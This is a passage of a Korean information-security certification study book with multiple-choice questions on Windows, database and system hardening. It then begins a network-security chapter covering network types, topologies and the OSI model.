90 228. 다음 중 널 세션(Null Session)에 대한 설명 중 올바르지 않은 것은? 1 널 세션 연결을 통해 시스템에서 서비스하는 서비 스 목록을 얻을 수 있다. 2 널 세션 연결은 서비스 거부 공격을 수행할 때 사 용될 수 있다. 3 레지스트리 값을 수정해서 익명 사용자의 네트워크 접근이 불가능 하도록 설정할 수 있다. 4 널 세션 연결은 시스템 기본 공유 폴더인 C$를 통 해 연결된다 Windows 시스템에서 운영되는 IIS(Internet Information Services) 웹서버에 대한 보안 고려 사항 으로 잘못된 것은? 1 IIS에 포함된 모든 샘플 어플리케이션을 사용 안함 또는 중지시킨다. 2 상위 경로 사용 안함을 설정하여 인가되지 않은 디 렉터리에 대한 열람을 금지시킨다. 3 파일 종류에 따라 기본적인 ACL을 줄 수 있도록 서브 디렉터리에 나눠서 정리한다. 4 가상 디렉터리에 존재하는 파일 중 script(.asp등)파 일은 Everyone그룹에게 실행/쓰기 권한을 제거하 고 읽기 권한만 부여한다 Windows 2000 운영체제를 설치하고 난 뒤 기 본 설정값에 대해 불필요한 권한을 제거하고 보안성을 강화하기 위해 보안 옵션 설정을 함으로써 시스템 보 안성을 강화할 수 있다. 제어판-->관리도구-->로컬보 안정책-->보안옵션설정에서 옵션 설정을 통한 보안성 강화를 사용할 수 있는데 다음 중 보안 옵션 설정이 알맞게 설정된 것은 무엇인가? 1 로그온하지 않고 시스템 종료 허용 -> "사용 안 함 "으로 설정 2 로그온 스크린에 마지막 사용자 이름 표시 안함 -> "사용안함"으로 설정 3 시스템이 시스템 계정 암호를 유지하지 않게 함 -> "사용안함"으로 설정. 4 시스템이 종료할 때 가상 메모리 페이지 파일 지움 -> "사용안함"으로 설정 231. 관리자가 계정을 만들지 않더라도 자동으로 Windows 2000 서버설치와 함께 만들어진 계정을 내 장된(builtin) 계정이라 한다. Windows 시스템에 기본 적으로 내장된 계정에 대한 설명으로 올바르지 않은 것은 무엇인가? 1 Administrator 계정은 계정명을 다른 이름으로 변 경하는 것이 보안적인 측면에서 도움이 된다. 2 Guest 계정은 시스템에 내장된 계정으로 지울 수 도, 이름을 변경할 수도 없다. 3 Administrator 계정은 시스템에 내장된 계정으로 삭제할 수 없다. 4 Guest 계정이 활성화되어 있다면 임의의 사용자가 Guest 계정을 이용해서 패스워드 없이 시스템에 로그인 할 수 있다 다음 중 NTFS 파일 시스템에 대한 설명으로 올 바르지 않은 것은 무엇인가? 1 NTFS 파일 시스템을 이용하면 폴더에도 암호화를 할 수 있는데 폴더에 암호화를 하면 그 폴더 안에 들어가는 파일들은 모두 암호화된다. 2 CONVERT명령을 사용해서 FAT32<->NTFS, NTFS<->FAT32 파일 시스템 변환을 수행 할 수 있 다. 3 파일 시스템을 NTFS로 바꾸는 명령어는 다음과 같 다. C:> CONVERT C: /FS:NTFS 4 NTFS를 사용하는 경우 접근을 허가해준 사람만이 사용자의 계정과 패스워드를 가지고 접근이 가능 하다 Mysql 실행 시 다음과 같이 아이디와 패스워드를 입력하고 실행중일 때 나타나는 문제점을 고르면? # mysql -u -p 1 mysqldump를 실행할 수 없다. 2 mysql 서버에 부하가 걸린다. 3 다른 사용자가 DB의 내용을 볼 수 있다. 4 다른 사용자가 ps -ef 했을 때 패스워드를 볼 수 있다. 90
91 234. 데이터베이스 보안 통제에 대한 설명으로 적당치 않은 것은? 1 객체 간의 흐름을 통제한다. 2 간접적인 데이터 노출로부터 데이터를 보호한다. 3 운영체제에서 다른 객체들과 접근 통제를 실시한다. 4 레코드, 필드 같은 데이터베이스에 객체는 상호 관련 없이 접근 통제가 이루어진다 데이터베이스 보안의 특성 설명 중 옳지 않은 것 은? 1 기밀성 보장 2 정보의 무결성 보장 3 시스템의 가용성 보장 4 정보의 부인 방지 보장 236. 데이터베이스의 주요 보안 문제 중 사용자가 특 정 정보에 접근할 수 있는 허가 또는 권한이 없지만 이런 정보의 구성 요소에 접근할 권한은 있을 때 발생 하는 보안 문제는 무엇인가? 1 다중 실증(Polyinstantiation) 2 집합(aggregation) 3 추론(inference) 4 데이터베이스 뷰(Database view) 238. 데이터베이스에 장애가 발생했을 때 체크포인트 를 이용하면 시작위치 대신 마지막으로 돌아갈 수 있 으므로 복구가 쉬워진다. 다음 중 체크포인트에 대한 설명으로 틀린 것은 무엇인가? 1 checkpoint 설정 시 checkpoint 숫자와 체크 시간 간격에 유의해야 한다. 2 checkpoint를 이용한 복구 상황으로 DB충돌이 있 다. 3 checkpoint 숫자가 많으면 DB 복구가 쉬워지며 시 스템 성능이 향상된다. 4 checkpoint 수행기준으로 Time interval, Operator Action, Log tape에 대한 레코드 기록이 있다 Oracle 데이터베이스 보안설정과 관련해서 다음 설명 중 틀린 것은 무엇인가? 1 모든 ORACLE Server 실행파일은 반드시 $ORACLE_HOME/bin 디렉터리에 위치하여야 한다. 2 SYS, SYSTEM, INTERNAL 계정은 DBA Role을 가진 사용자에게만 사용권한이 주어져야 한다. 3 $ORACLE_HOME/bin 디렉터리에 위치한 파일의 접 근권한은 644모드로 설정한다. 4 ORACLE 사용자의.login,.cshrc, ora.profile 파일 접근 권한은 644모드로 설정한다 데이터베이스 보안 검사 요소로 권한 체크, 인증 체크, 시스템 정확성 체크가 있다. 다음 중 시스템 정 확성 체크에 해당하는 항목은 무엇인가? 1 로그온 제한시간 2 추측가능 패스워드 3 트로이목마 4 오브젝트 소유권 240. 데이터베이스의 주요한 보안 문제 중 추론은 명 시적으로 사용 가능하지 않은 정보를 이끌어 내는 능 력을 말하는데 다음 중 이런 추론공격을 방지하기 위 한 방법이 아닌 것은? 1 잡음 및 혼란(noise and perturbation) 2 롤백(rollbacks) 3 셀 은폐(cell suppression) 4 데이터베이스 구획화(Partitioning the database) 241. 다음에 설명하는 데이터베이스 보안 방식 유형 중 분별 보안(Discretionary Security)에 대한 설명으로 올바른 것은? 1 특정 사용자들에게 DB의 특정 내용만을 접근하도 록 허용(예: 특정 file, record, field 등에 대한 접근) 2 저장되는 데이터의 암호화 및 해독 3 DB 전체 내용에 대한 접근 금지(예:user account, password 등) 4 사용자 및 데이터를 여러 등급의 보안으로 분류(다 단계보안) 91
92 242. 데이터베이스 보안을 위해 SQL 명령어 중에 포 함되지 않아야 할 명령어는 다음 중 무엇인가? 1 Select, Update 2 Grant, Revoke 3 Delete, Insert 4 Add, Replace 247. 개체간의 관계와 제약조건을 나타내고 데이터베 이스의 접근 권한, 보안 및 무결성 규칙 명세가 있는 스키마는 다음 중 무엇인가? 1 내부 스키마 2 외부 스키마 3 개념 스키마 4 서브 스키마 243. 데이터베이스를 구축함으로써 얻어지는 이점이 아닌 것은? 1 데이터의 중복이 완전히 제거된다. 2 데이터의 일관성이 유지된다. 3 데이터의 보안성이 유지된다. 4 사용자가 데이터를 공동으로 사용할 수 있다 다음 중 데이터베이스의 특징이 아닌 것은? 1 실시간 접근성(Real-time accessibility) : 사용자 요 구에 대한 실시간 처리 및 응답 2 계속적 변화(Continuous evolution) : 동적인 데이 터 삽입, 삭제, 갱신 작업으로 현재의 정확한 데이 터 계속 유지. 3 동시 공용(Concurrent sharing) : 여러 사용자가 동 시에 동일한 데이터 이용 가능 4 주소에 의한 참조(Address reference) : 데이터의 검색이 데이터의 위치로 이루어지는 특징 245. 데이터 구조도가 트리 형태로 이루어져 있으며 부모-자식(parent-child)관계가 1:n 관계인 것은 어느 데이터모델의 특성인가? 248. 데이터베이스 보안 시 요구되는 보안 요구 사항 에 속하지 않는 것은? 1 기밀성 2 무결성 3 가용성 4 부인방지 249. 데이터베이스에 대한 보안 위협 요소에 포함되지 않는 것은? 1 부적절한 정보의 노출 2 부적절한 정보의 변경 3 서비스 거부 4 시스템의 성능 저하 250. 윈도우 2000의 Security System Component 중 하나이며, 사용자의 이름과 패스워드 혹은 스마트 카 드 PIN을 획득하는데 사용되고 사용자 영역에 DLL 형 태로 존재하는 모듈은 다음 중 어떤 것인가? 1 SRM (Security Reference Moniter) 2 SAM (Security Account Manager) 3 GINA (Graphical Identification and Authentication) 4 LSASS (Local Security Authority Subsystem) 1 계층형 모델 3 관계형 모델 2 네트워크형 모델 4 객체지향형 모델 251. 다음 보기 중 윈도우 시스템을 안전하게 보호하 기 위한 보안 설정 방법이 아닌 것은? 246. 수학의 집합 이론에 근거하여 개체의 모든 데이 터와 데이터 사이의 관계를 2차원 평 면 테이블로 표현한 것은 어느 데이터모델의 특성인 가? 1 윈도우의 모든 보안 패치를 설치한다. 2 모든 미사용 계정을 정리한다. 3 모든 사용자에 대한 로그온 설정을 강화한다. 4 되도록 모든 파일 시스템을 EFS(Encryption File System)를 사용해서 보호한다. 1 계층형 모델 3 관계형 모델 2 네트워크형 모델 4 객체지향형 모델 92
93 252. 인터넷 익스플로러는 기본적으로 구성 가능한 보 안 영역을 제공한다. 다음은 이들 보안 영역에 대한 설명이며, 이들 설명 중 잘못된 것을 고르시오. 1 로컬 인트라넷 영역은 방화벽 뒤에 있는 또는 조직 내의 사이트를 말하며, 이 사이트들은 보통 가장 높은 수준의 신뢰를 갖는다. 2 신뢰하는 사이트 영역은 방화벽 내부에 있거나 혹 은 방화벽 밖에 위치할 수 있는 영역을 말하며 여 러분이 가장 높은 신뢰를 갖고 있는 사이트이다. 3 제한된 사이트 영역은 여러분이 명시적으로 불신하 는 사이트를 말하며, 이 영역은 윈도우를 새로 설 치할 때 비어 있다. 4 인터넷 영역은 기타 범주에 들어가지 않는 모든 사 이트들이 해당된다 윈도우 시스템에서 아웃룩이나 아웃룩 익스프레 스의 첨부 파일을 통해 바이러스가 감염될 수 있으며, 다음은 이들 첨부 파일의 바이러스 감염 여부를 판단 하는 방법을 나타낸 것이다. 이중 잘못된 것을 고르시 오. 1 파일의 확장자가 exe인 경우에는 바이러스일 가능 성이 많으므로 안티 바이러스 프로그램을 통해 먼 저 바이러스 감염 여부를 확인하고 실행을 해야 한다. 2 첨부 파일이 myparty.yahoo.com 등과 같은 웹사이 트의 링크 파일인 경우는 클릭을 해서 해당 웹페 이지로 이동해도 전혀 문제가 없다. 3 마이크로 소프트 보안 업데이트 Q exe라며 첨부 파일로 도착한 메일의 경우 첨부 파일의 바 이러스 감염 여부를 확인해야 한다. 4 파일의 확장자가 txt인 경우에도 바이러스일 가능 성이 있으므로 안티 바이러스 프로그램을 통해 먼 저 바이러스 감염 여부를 확인하고 파일을 열어야 한다 다음은 EFS를 사용해서 암호화 파일을 사용하는 경우를 설명한 것이다. 이 중 잘못 설명한 것을 고르 시오. 1 NTFS 상에서 암호화된 파일을 FAT32 볼륨에 복사 하면, 파일은 암호화된 상태로 남아 있게 된다. 2 암호화된 파일을 동일 볼륨 상의 다른 폴더로 이동 하면 파일은 암호화된 상태로 나아 있다. 3 콘솔 상에서 Cipher.exe를 사용해서 파일의 암/복호 화를 할 수 있다. 4 암호화되지 않은 파일을 암호화된 폴더로 복사하거 나 이동을 하게 되면, 암호화된 폴더에 추가한 사 본이 암호화 된다 백오리피스(BO)를 트로이목마 형태로 변환시키는 데 사용하는 프로그램은? 1 inflex 2 SaranWrap 3 OptOut 4 SoftIce 256. NTFS 보안 기능의 하나이며, 컴퓨터의 선택된 자 원에 대한 접근을 추적할 수 있는 기능은 무엇인가? 1 감사(Auditing) 2 허가권(Permission) 3 접근통제리스트(Access Control List) 4 트랜잭션 기록(Transaction Logging) 257. 다음 액티브 디렉토리에 대한 설명 중 잘못된 것 을 고르시오. 1 액티브 디렉토리는 디렉토리 내의 모든 정보가 다 중장소의 다중의 컴퓨터가 위치할 수 있는 분산 디렉토리이다. 2 액티브 디렉토리는 개체, 조직, 도메인, 트리, 포리 스트와 같은 다섯 요소로 구성된 논리적 구조이다. 3 액티브 디렉토리에서 새 사용자를 생성하기 위해서 는 사용자 이름과 패스워드가 필요하다. 4 명령 프롬프트에서 Net user Username /delete 명령을 통해 액티브 디렉토리 내의 사용자를 삭제 할 수 있다 다음은 NTFS v4의 장점에 대한 설명이다. 이중 잘못된 것을 고르시오. 1 로컬 보안 지원 2 긴 파일이름 지원 3 암호화 지원 4 압축 지원 259. 다음은 윈도우 2000 레지스트리에 대한 설명이 다. 이 중 잘못된 것을 고르시오. 1 HKEY_CLASS_ROOT는 파일 확장자와 현재 사용자 의 설정 정보를 저장하고 있다. 2 윈도우 2000의 regedt32.exe를 사용해서 레지스트 리를 편집할 수 있다. 3 레지스트리의 루트에는 5개의 루트키가 있으며, 이 들 5개의 루트키는 하이브로 알려져 있다. 4 레지스트리는 파일 시스템처럼 디자인 되었으며, 레지스트리는 로컬 하드디스크의 바이너리 데이터 베이스에 저장이 된다. 93
94 260. 다음은 여러분의 개인 정보를 침해하는 조사자를 접근시키지 않는데 도움이 되기 위해 적용할 수 있는 실무 지침의 체크 리스트이다. 이중 잘못된 것을 고르 시오. 1 만약 Internet Explorer 5를 사용한다면, 우수한 쿠 키 관리를 위하여 버전 6으로 업그레이드한다. 2 전자 메일을 통해 PIN을 요청하는 누군가를 의심한 다. 만약 전자 메일을 통해 그러한 정보를 전송해 야 한다면, S/MIME이나 PGP 암호화를 사용한다. 3 신용 카드 번호, 주민 등록 번호, 운전면허 번호를 요청하는 어떠한 인터넷 사이트가 SSL이나 SET과 같은 안전한 프로토콜을 사용하는지 확인한다. 4 윈도우 미디어 플레이어에서 인터넷 사이트에서 플레이어를 고유하게 식별하도록 허용 옵션을 선 택하다 윈도우 2000 혹은 윈도우 XP에서 네트워크를 외 부 공격자에게 희생되지 않도록 경계를 안전하게 하기 위한 방법 중 잘못된 것을 고르시오. 1 인터넷 연결에서 파일 공유를 사용하지 않는다. 2 만약 허브나 스위치를 통해 인터넷 연결을 공유한 다면 IPX/SPX를 사용하는 대신 TCP/IP를 사용해서 공유를 하는 것이 좀더 안전하다. 3 윈도우 XP Professional을 실행하는 컴퓨터에서, 여 분의 보안을 위하여 단순한 파일 공유(Simple File Sharing)를 사용하지 않을 것을 고려한다. 4 드라이브가 민감한 데이터 파일만을 포함하는 한 드라이브의 루트 폴더를 공유하지 않는다 다음은 사용자 계정, 암호, 로그온 프로세스를 보 호하기 위한 방법이다. 잘못된 것을 고르시오. 1 각 계정을 적절한 보안 그룹에 할당한다. 2 클래식 로그온 화면을 사용하는 대신 새로운 시 작 화면을 사용한다. 3 암호 재설정 디스크 를 만든다. 4 초강력 보안을 위해서는 시스템 시동키를 제거하 여, 로그온 화면이 나타나기 전에 암호 디스크나 플로피 디스크를 요구하도록 하는 설정을 고려해 본다 다음은 보안 이벤트에 대한 감사 정책 및 그에 대한 설명이다. 잘못된 것을 고르시오. 1 시스템 이벤트 감사 시스템 이벤트는 사용자가 컴퓨터를 재시작/종료할 때 또는 어떤 이벤트가 시 스템 보안이나 보안 로그에 영향을 미칠 때 발생 한다. 2 계정 관리 감사 계정 관리 이벤트는 사용자나 보 안 그룹이 생성/변경/삭제될 때, 사용자 계정이 이 름 변경/활성화/비활성화 될 때, 암호가 설정되거 나 변경될 때 발생한다. 3 계정 로그온 이벤트 감사 계정 로그온 이벤트는 사용자가 네트워크를 통하여 로그온/로그오프를 시 도하거나 로컬 사용자 계정으로 인증 받을 때 발 생한다. 4 개체 액세스 감사 사용자가 사용자 권한(다른 유 형의 이벤트를 유발하는 로그온과 로그오프, 네트 워크 액세스 권한은 제외)을 시행할 때 발생한다 다음은 윈도우 시스템에서의 시스템 취약점 점검 도구에 대한 설명이다. 이중 바르지 못한 것을 고르시 오. 1 Vetescan local 윈도우 NT와 및 유닉스 시스템에 대한 시스템 설정사항 점검 도구로서 백도어나 트 로이안 목마의 유무 등을 점검 2 HFNetChk 윈도우 시스템의 패치 점검 도구로서 최신 보안 패치의 설치 유무를 점검 3 kstat 윈도우 시스템의 커널 레벨에서 시스템 서 비스를 가로채어 은닉 기능을 구현하는 공격을 탐 지하는 도구 4 fportn 윈도우 시스템에서 모든 열려진 TCP/IP, UDP 포트와 그에 해당하는 프로세스를 알려줌 265. 네트워크의 인터넷 연결을 안전하게 하기 위한 다음의 절차 중 잘못된 것을 고르시오. 1 라우터나 게이트웨이를 네트워크에 추가하거나 인 터넷 연결 공유를 사용하지 않는다. 2 인터넷 연결 지점이 되는 컴퓨터에서 파일과 프린 터 공유를 비활성화한다. 3 외부 공격으로부터 인터넷 연결을 보호하기 위해 개인용 방화벽을 추가한다. 4 인터넷으로부터 웹 기반 관리 도구로의 액세스를 비활성화시킨다. 94
95 266. NCSC(National Computer Security Center)는 컴 퓨터 시스템에서 정부, 기업, 개인 유저들의 Private Data에 대한 보호 평가 기준으로 다음과 같은 보안 등 급(Security Ratings)을 만들었다. 이중 C2 등급은 범용 OS를 위해 충분한 안전성을 제공하는 등급으로 간주 된다. 다음 중 C2 등급에 해당하지 않는 것을 고르시 오. 1 Trusted path functionality 2 A secure logon facility 3 Discretionary access control 4 Security auditing 267. 무선 네트워크를 사용 시, 공유 자원의 안전 대책 을 위한 수행 중 옳지 않은 것은? 1 강력한 암호로 무선 접근 지점을 구성한다. 2 보안 픽스(Security fixes)를 통합한 가장 최근의 버 전으로 무선 하드웨어의 펌웨어를 업그레이드한다. 3 접근 지점의 네트워크 이름(SSID)을 회사에 대한 어떠한 정보를 제공하지 않도록 변경하고, 하드웨 어의 기본값과 일치하도록 한다. 4 WEP(Wired Equivalent Privacy)를 사용하고 강력한 키를 설정한다 다음의 Windows 서비스 중 잘못 설명이 잘못 된 것은? 1 Alerter Net Send 명령을 통해 액세스될 수 있는 관리자 경고기능을 제공한다. 2 Cryptographic Services 제공하는 기능 중 가장 중요한 것은 장치 드라이버나 ActiveX 컨트롤 등의 서명된 파일을 위한 디지털 서명 검증이다. 3 Automatic Updates Windows Update 사이트의 업데이트와 패치를 체크하고 옵션을 선택하였을 경우 수동적으로 다운로드한다. 4 Event Log 시스템 이벤트 로그를 유지하는데, 이 서비스는 비활성화하지 않아야 한다 Window 2000 Server를 관리하기 위한 가장 주요 한 도구 중 하나가 바로 MMC이다. 다음 설명 중 옳 지 않은 것은? 1 기본적으로 Window 2000은 MMC 콘솔 파일을.mmc라는 확장자명으로 관리 도구 폴더에 저장한 다. 2 각각의 MMC 콘솔은 콘솔에 포함된 스냅인들의 계 층 구조를 표시하기 위한 콘솔 트리와 활성화되어 있는 스냅인의 내용 목록을 나타낸다. 3 스냅인이란 MMC에서 작동하도록 디자인된 어플리 케이션이다. 하나의 스냅인은 하나의 관리 기능의 단위를 나타내고, 이 스냅인은 콘솔 확장의 최소 단위이다. 4 스냅인은 Windows95, Windows98, Windows NT4.0을 위한 클라이언트를 지원하지 않는다 WINS에 대한 설명으로 옳은 것은? 1 WINS는 NetBIOS 컴퓨터 이름을 등록하고 그것들 을 IP주소로 분해하는 확장된 NetBIOS 이름 서버 이다. 2 WINS는 컴퓨터 이름과 IP주소를 매핑 정보를 포함 하는 정적인 데이터베이스를 제공한다. 3 WINS 클라이언트는 주 DNS 서버를 찾기 위해 네 번 시도를 한다. 4 주 WINS 서버가 사용할 수 없다면, 클라이언트는 보조 WINS 서버로 스위칭하기 전에 한 번 요청을 한다 다음은 보안책임을 맡은 서버 관리자의 업무를 나열한 것이다. 이중 부적합한 것을 고르시오. 1 시스템 로그 파일들을 주기적으로 분석해서 서버의 상태 및 공격 시도가 있었는지를 분석하여 이에 대처한다. 2 서버의 모든 서비스 포트를 비활성화 시켜서 공격 자가 서버를 공격하지 못하도록 한다. 3 바이러스 방지 프로그램을 설치하고 주기적으로 업 데이트 한다. 4 패치가 이루어지지 않았거나 오래된 보안상의 약점 을 가진 소프트웨어를 찾아내 제거 한다. 95
96 272. 디지털 인증서에 대한 설명 중 잘못 된 것은? 1 인증서에는 공개키, 이름이나 전자 메일 주소와 같 은 신원, 인증서의 유효 날짜, 인증서를 발행한 CA 의 신원 CA의 디지털 서명이 들어있다. 2 인증서는 한 가지 용도에만 사용되어져야 한다. 3 인증서를 인증하는 것은 신뢰 계층 구조 안에서 작 동한다. 인증서를 제거하지 않은 이상, 신뢰된 루 트 인증기관 저장소에 기본적으로 설치되어 있는 모든 CA가 발행한 인증서는 문제없이 신뢰한다. 4 인증서 관리를 위한 도구로는 [인증서]대화상자나, MMC의 인증서 스냅인이 있다 275. 스파이웨어에 대한 설명으로 옳지 않은 것은? 1 스파이웨어는 보통 광고 목적 사용된다. 2 스파이웨어는 보통 레지스트리 값을 수정해버리고 자신의 모습을 감춰 사용자가 실행되는지 여부를 잘 구분할 수 없게 만든다. 3 Lavasofr의 제품인 Ad-aware를 통해서 의심스러운 레지스트리 키와 값을 찾고 의심스러운 쿠키를 발 견하면, 로컬 저장소에서 실행 가능한 스파이웨어 를 추적, 삭제한다. 완전한 삭제가 가능하다. 4 무료 공개 소프트웨어를 내려 받거나 인증서 없는 ActiveX 프로그램을 실행할 때 자동적으로 설치된 다 다음은 침입 탐지 시스템(Intrusion Detection System)에 대한 설명이다. 이중 잘못된 것을 고르시오. 1 침입 탐지 시스템의 일반적인 구조는 다음과 같다. 데이터수집 -> 데이터 축약 -> 탐지->응답 2 침입 탐지 기법에는 비정상 행위 탐지기법 및 오용 탐지 기법이 있다. 3 네트워크 기반 IDS(N-IDS)는 네트워크 일부를 돌아 다니는 공격의 증거를 찾으면서 네트워크 트래픽 을 감시하는 전체적인 시스템에 상주한다. 4 대응방법으로는 수동적인 대응과 능동적인 대응 방 법이 있다. 수동적인 대응은 공격자의 행위에 직접 적으로 행위를 하지 않는다. 능동적인 대응은 공격 자의 행위를 직접적으로 방해한다 다음은 개인 정보를 보호하기 위한 설명이다. 이 중 옳지 않은 것은? 1 신용카드 번호, 주민 등록 번호, 운전면허 번호를 요청하는 인터넷 사이트가 SSL(Secure Sockets Layer)이나 SET(Secure Electronic Transaction)같은 안전한 프로토콜을 사용하고 있는지 확인한다. 2 전자 메일을 통해 PIN(Personal Identification Number)을 요청하는 누군가를 의심한다. 3 통제 하에 있지 않은 어떠한 컴퓨터에서 폼이나 암 호를 사용하기 위하여 Internet Exploer의 자동 완 성 기능을 사용하지 않는다. 4 편리함과 개인 정보 사이에서 균형을 이루는 쿠키 정책을 수립한다. 제 3사 쿠키를 받아들인다 인증서 백업을 위한 방법으로 옳지 못한 것은? 1 개인 인증서는 로그온 한 상태에서 파일을 암호화/ 복호화 하는 데 사용되는 공개/개인 키 쌍을 담고 있다. 2 Windows는 지정된 데이터 복구 에이전트를 위한 인증서를 생성할 수 있다. 3 시스템 관리자는 파일 복구 인증서와 데이터 복구 에이전트의 개인키를 꼭 백업해야 한다. 4 [파일 복구]라고 목적이 표시되는 인증서는 [암호화 파일 시스템]이라고 목적이 표시되는 개인 암호화 인증서와 동일하게 사용된다 다음 중 커버로스 v5 프로토콜의 구성요소가 아 닌 것은? 1 KDC(Key Distribution Center) 2 PCL(Permission Control List) 3 TGT(Ticket-Granting Ticket) 4 서비스 티켓(Service Ticket) 278. 커널모드 구성 요소 중 설명이 잘못된 것은 무엇 인가? 1 Process Manager(프로세스 관리자) Thread를 생 성하고 요청에 따라 처리한다. 2 Object Manager(객체 관리자) 파일, 포트, 프로세 스, 스레드등 Windows NT의 다양한 컴퍼넌트에 대한 이름 공간을 제공한다. 3 Local Procedure Call Pacility 클라이언트와 서버 간의 소통을 관리한다. LPC는 클라이언트와 서버가 다른 컴퓨터에 있을 때 통신을 관리한다. 4 Virtual Memory Manager(가상 메모리 관리자) 가상 메모리를 구현하고 제어한다. 메모리 관리는 각 프로세스에 전용 주소 공간을 제공하고 그 주 소 공간을 보호한다. 96
97 제 2장. 네트워크 보안 제 1절. 네트워크 이해 chapter 1. 네트워크 개요 chapter 2. 네트워크 토폴로지 chapter 3. OSI 참조 모델 제 2절. 침입 차단 시스템 chapter 1. 침입 차단 시스템 개요 chapter 2. 침입 탐지 시스템 보안 정책 chapter 3. 침입탐지 시스템 한계성 및 고려 사항 제 3절. 가상 사설망 chapter 1. 가상 사설망 개요 chapter 2. 가상 사설망 기술 제 4절. 인터넷 서비스 보안 chapter 1. WEB 보안 chapter 2. FTP 보안 chapter 3. Telnet 보안 chapter 4. 보안 chapter 5. DNS 보안 제 5절. 네트워크 보안 문제 풀이 chapter 1. 종합 문제 97
98 제 1절.네트워크 이해 chapter 1. 네트워크 개요 통신이란 한 지점에서 원하는 다른 지점까지 의미 있는 정보를 보다 정확하게 빠르게 상대방이 이해가 될 수 있도록 전송하는 것을 의미한다. 오늘날의 컴퓨터 네트워크는 지리적으로 분산되어 있는 위치에 서 상호 간에 자원의 공유를 가능하게 하기 위하여 상호 연결된 동질적인 혹은 이질적인 컴퓨터 시스 템의 집단을 말한다. 컴퓨터 네트워크는 규모에 따라 크게 LAN, MAN, WAN으로 구분될 수 있다. 가. LAN(Local Area Network) 동일한 지역 내(건물, 공장)에서 통신 관련 기기와 사무자동화 기기 등을 고속의 전용회선으로 연결하 여 구성하는 통신망을 LAN(Local Area Network)이라 한다. o 특성 - 단일 기관 소유의 네트워크이다. - 수 Km 범위 이내 한정된 지역을 갖는다. - WAN보다 빠른 통신 속도를 가질 수 있다. 나. WAN(Wide Area Network) 서로 관련이 있는 LAN들 간을 상호 연결시킨 망을 WAN이라 하며, 설계와 성능에 영향을 주는 주된 요인은 전송 매체이다. o 특성 - 전송속도 : 56Mbps 이하 - LAN에 비해 선로 에러율이 높고, 전송지연도 크다. - LAN에 비해 복잡한 네트워크 구조를 갖게 되므로 두 목적지간을 최단경로로 연결시켜 주는 라우팅 알고리즘이 중요하다. - WAN의 설계 시 전송 효율과 특성을 고려하여야 한다.- 제한된 트래픽 조건하에서 흐름 제어와 과도한 지연을 제거하여야 한다. 다. MAN(Metropolitan Area Network) LAN과 WAN의 중간 형태의 새로운 네트워크로 데이터, 음성, 영상 등을 지원하기 위해 개발되었다. o 특성 - 전송속도 : 45Mbps 이상 - 네트워크 서비스 범위 : 최대 75Km 정도 - 전송매체 : 동축 케이블, 광케이블 - IEEE 접속방식이 표준화된 매체액세스제어(MAC) 프로토콜이 사용된다. - DQDB(Distributed Queue Dual Bus) 98
99 가. 네트워크 토폴로지 정의 chapter 2. 네트워크 토폴로지 네트워크의 배열 형상으로 다수의 기기가 통신 링크로 상호 연결된 방식을 네트워크 토폴로지라 한다. 나. 토폴로지의 설계 목적 o 데이터의 정확한 수신을 보장하는 최대 신뢰도 제공 o DTE 간의 전송 경로 중 가장 적은 비용의 경로 선택 o 사용자에게 최적의 응답시간 제공 다. 네트워크 토폴로지 종류 (1) 계층형(트리형) o 계층적 구조를 이루고 있는 네트워크 o 최상위에 있는 DTE가 네트워크 제어 o 네트워크 제어가 간단 o 병목현상이 발생할 수 있음 o 최상위의 DTE가 고장나면 네트워크 마비 (2) 수평형(버스형) o 근거리 통신망에서 볼 수 있는 일반적인 형태 o DTE 간의 흐름제어 o 물리적 구조가 간단 o DTE 추가 삭제가 용이 o 하나의 DTE가 여러 DTE에 방송o 하나의 DTE가 고장나도 전체 네트워크에 영향이 없음 o 통신선로 상에 있는 모든 단말기가 데이터를 수신 o 우선 순위 제어가 어려움 o 통신 회선의 길이에 제한 (3) 성형(스타형) o 중앙에 있는 컴퓨터를 중심으로 터미널이 연결된 중앙 집중식 형태 o 유지보수, 관리가 용이 o 단말기 고장 발견이 용이 o 중앙 제어형이므로 중앙 컴퓨터 고장 시 전체네트워크 마비 o 통신망 제어가 복잡 99
100 (4) 원형(링형) o 서로 이웃되는 DTE 간 연결 o 전송매체와 DTE 고장 시 발견이 용이 o 매체 액세스 방식은 토큰링 이용 o 동축 케이블이나 광섬유 케이블 이용 o 단말기 추가, 삭제 어려움 o 전송 지연 발생 o DTE 간의 순차적 전송 때문에 중계기 기능이 필요 (5) 망형(그물형) o 모든 DTE를 상호 연결 o 통신 회선 장애 시 다른 경로로 데이터 전송이 가능 o DTE 고장과 병목 현상에 대해 면역성이 있음 o 가장 많은 통신 선로가 필요 100
101 chapter 3. OSI 참조 모델 통신시스템에서 자주 언급되는 프로토콜이란, 어떤 데이터 또는 컴퓨터 통신 시스템에서 원격에 떨어 져 있는 통신 실체 간에 불완전한 매체를 통하여 확실한 통신을 달성할 수 있도록 해주는 일련의 절차 나 규범이라고 정의할 수 있으며 어떤 유형의 시스템이라도 그 근본 구조와 무관하게 통신을 가능하게 해주는 프로토콜의 집합을 개방시스템(Open System)이라 말한다. 유형이 다른 시스템 간에 문제없이 통신이 가능하도록 규칙(프로토콜)을 만들어야 하기 때문에 유형이 다른 시스템의 수가 증가할수록 점점 문제가 커지고 어려워진다. ISO(International Standard Organization: 국제 표준화 기구)에서는 이러한 문제들을 해결하기 위하여 개방시스템 상호 연결(OSI: Open System Interconnect) 참조 모델을 개발하였다. 다음 [표 5-1]은 OSI 참조모델과 TCP/IP 모델을 소개 비교한 것이다. 가. Physical Layer 1과 0의 연속으로 이루어진 비트의 전송에 관여하며, [표 5-2]와 같은 4가지 사항에 관한 규정을 다룬 다. X.21, RS232C, RS449/422-A/423-A 등이 물리 계층 프로토콜에 속한다. 101
102 나. Data Link Layer Data Link Layer는 통신 경로 상의 지점 간(link-to-link) 오류 없는 데이터 전송에 관한 계층이다. 전송 되는 비트의 열을 일정 크기 단위의 프레임으로 잘라 전송하고, 전송 도중 잡음으로 인한 오류 여부를 검사하며, 수신측 버퍼의 용량 및 양측의 속도 차이로 인한 데이터 손실이 발생하지 않도록 흐름제어 등의 역할을 한다. HDLC, CSMA/CD, ADCCP, LAPB 등이 데이터 링크 계층 프로토콜의 예이다. 다. Network Layer 송신측으로부터 수신측에 이르기까지의 패킷 경로를 설정해주는 기능과 너무 많은 패킷이 한쪽 노드에 집중되는 병목 현상을 방지하는 기능(Congestion control)을 수행한다. 또한 이질적인 네트워크를 연결 하고자 할 시, 프레임의 크기나 주소 지정방식이 다름으로써 발생하는 문제를 극복해주는 기능을 수행 한다. IP, X.25 등이 네트워크 계층 프로토콜의 예이다. (1) IP IP(Internet Protocol)는 